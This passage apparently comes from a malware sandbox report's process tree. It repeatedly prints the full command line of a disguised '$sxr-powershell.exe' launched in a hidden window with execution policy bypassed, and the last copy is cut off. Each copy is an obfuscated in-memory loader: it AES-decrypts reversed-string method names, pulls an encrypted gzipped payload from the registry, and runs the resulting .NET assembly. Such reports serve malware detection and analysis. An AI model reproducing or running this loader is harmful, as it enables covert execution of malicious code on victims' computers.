                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:1784
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:4508
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEZNJsF5SJYqVUT/2Xu3ww==');$fAcMg = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fAcMg, 0, $fAcMg.Length);$fAcMg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fAcMg);$XwAut = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XlCtXzJxTmuEST/jokQ+pA==');$XwAut = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XwAut, 0, $XwAut.Length);$XwAut = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XwAut);$Fefhh0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Gbxsp83W2G+qV7IdPS3JA==');$Fefhh0 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh0, 0, $Fefhh0.Length);$Fefhh0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh0);$Fefhh1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5B7Nkbhr9v5gOMD6+/vxEQ==');$Fefhh1 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh1, 0, $Fefhh1.Length);$Fefhh1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh1);$Fefhh2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cPaOl9iz80JefOsJ4GC31g==');$Fefhh2 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh2, 0, $Fefhh2.Length);$Fefhh2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh2);$Fefhh3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XbnoaTEasEFT/t1P4h+seQ==');$Fefhh3 = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh3, 0, $Fefhh3.Length);$Fefhh3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh3);$MIdLG.Dispose();$aUyxc1.Dispose();$szZfE = [Microsoft.Win32.Registry]::$fAcMg.$GvZOL($Fefhh).$BjALC($kujZJ);$qaEKQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($szZfE);$aUyxc = New-Object System.Security.Cryptography.AesManaged;$aUyxc.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$GbvTI = $aUyxc.('rotpyrceDetaerC'[-1..-15] -join '')();$qaEKQ = $GbvTI.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qaEKQ, 0, $qaEKQ.Length);$GbvTI.Dispose();$aUyxc.Dispose();$xvhuX = New-Object System.IO.MemoryStream(, $qaEKQ);$wJSbI = New-Object System.IO.MemoryStream;$RIKgg = New-Object System.IO.Compression.GZipStream($xvhuX, [IO.Compression.CompressionMode]::$Fefhh1);$RIKgg.$XwAut($wJSbI);$RIKgg.Dispose();$xvhuX.Dispose();$wJSbI.Dispose();$qaEKQ = $wJSbI.ToArray();$VgaAf = $nLQSD | IEX;$dYcrb = $VgaAf::$Fefhh2($qaEKQ);$UwoNE = $dYcrb.EntryPoint;$UwoNE.$Fefhh0($null, (, [string[]] ($NmvlL)))
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Hide Artifacts: Hidden Window
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3572
                                                                                                                    • C:\Windows\$sxr-powershell.exe
                                                                                                                      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3896).WaitForExit();[System.Threading.Thread]::Sleep(5000); $aUyxc1 = New-Object System.Security.Cryptography.AesManaged;$aUyxc1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aUyxc1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aUyxc1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('N/ggxjH5ioKuSczpWWShM4G5q0I8NboGH3IOSYcG5mU=');$aUyxc1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jbpUTLi7/XDDtM+ahy1F2w==');$MIdLG = $aUyxc1.('rotpyrceDetaerC'[-1..-15] -join '')();$Fefhh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kacTDFH7euHOedo7fwIWWg==');$Fefhh = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Fefhh, 0, $Fefhh.Length);$Fefhh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Fefhh);$kujZJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0ykf07DVvNskVBPWRZprpGZ1fAt3J1q/qJFaWbyL574=');$kujZJ = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kujZJ, 0, $kujZJ.Length);$kujZJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kujZJ);$NmvlL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CRRXM75ZrsUhJMCFqePWuQ==');$NmvlL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NmvlL, 0, $NmvlL.Length);$NmvlL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NmvlL);$nLQSD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GS0bmvOUap5I6ORyZtBh6ZQmXnalFFGi6/Y7E52AWCaqNDT6fxK4gHBWR3r4s3xCkXx9VWFEf2w3R2WVc3J60OnBY32UVSpUWOF8zysHXTFxBiXUIIOqojKckMm4XOltHp6MNoJ9fC+ewBdsTVHTUwKZ0aVnvoVDrPGjrp1fhLllj38OsTbmh4h6eJM6Yp+iiFdKlQdoGBlK1wu+bCD1xhfQ7VLVa0S3zaiPvFpgbIyOYBCP5CWPRgWoIMmOb9cuYTS/bouRVbJIaaJIheDP7AqK+2mSTQgMjKS9NgKgwowvGzhVU82j9ZbFQe6zb/Slvf65CQUf4UdZ/2cXkiMyGp3tY21l4wBgIghpC3iFnD87WmLsT7yOhnY15Z370q2UEsaBuC+b8lOt42PzfdJzkDra3td3QFUtcWjLAN9qSP8=');$nLQSD = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nLQSD, 0, $nLQSD.Length);$nLQSD = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nLQSD);$dCPnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IQxnPlY0pUcPW0QRSrEFag==');$dCPnP = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dCPnP, 0, $dCPnP.Length);$dCPnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dCPnP);$BjALC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aIfIjghfGVJtu04srrjCrw==');$BjALC = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BjALC, 0, $BjALC.Length);$BjALC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BjALC);$GvZOL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TsJQJdbflklVcbuxDdE/ig==');$GvZOL = $MIdLG.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GvZOL, 0, $GvZOL.Length);$GvZOL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GvZOL);$fAcMg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 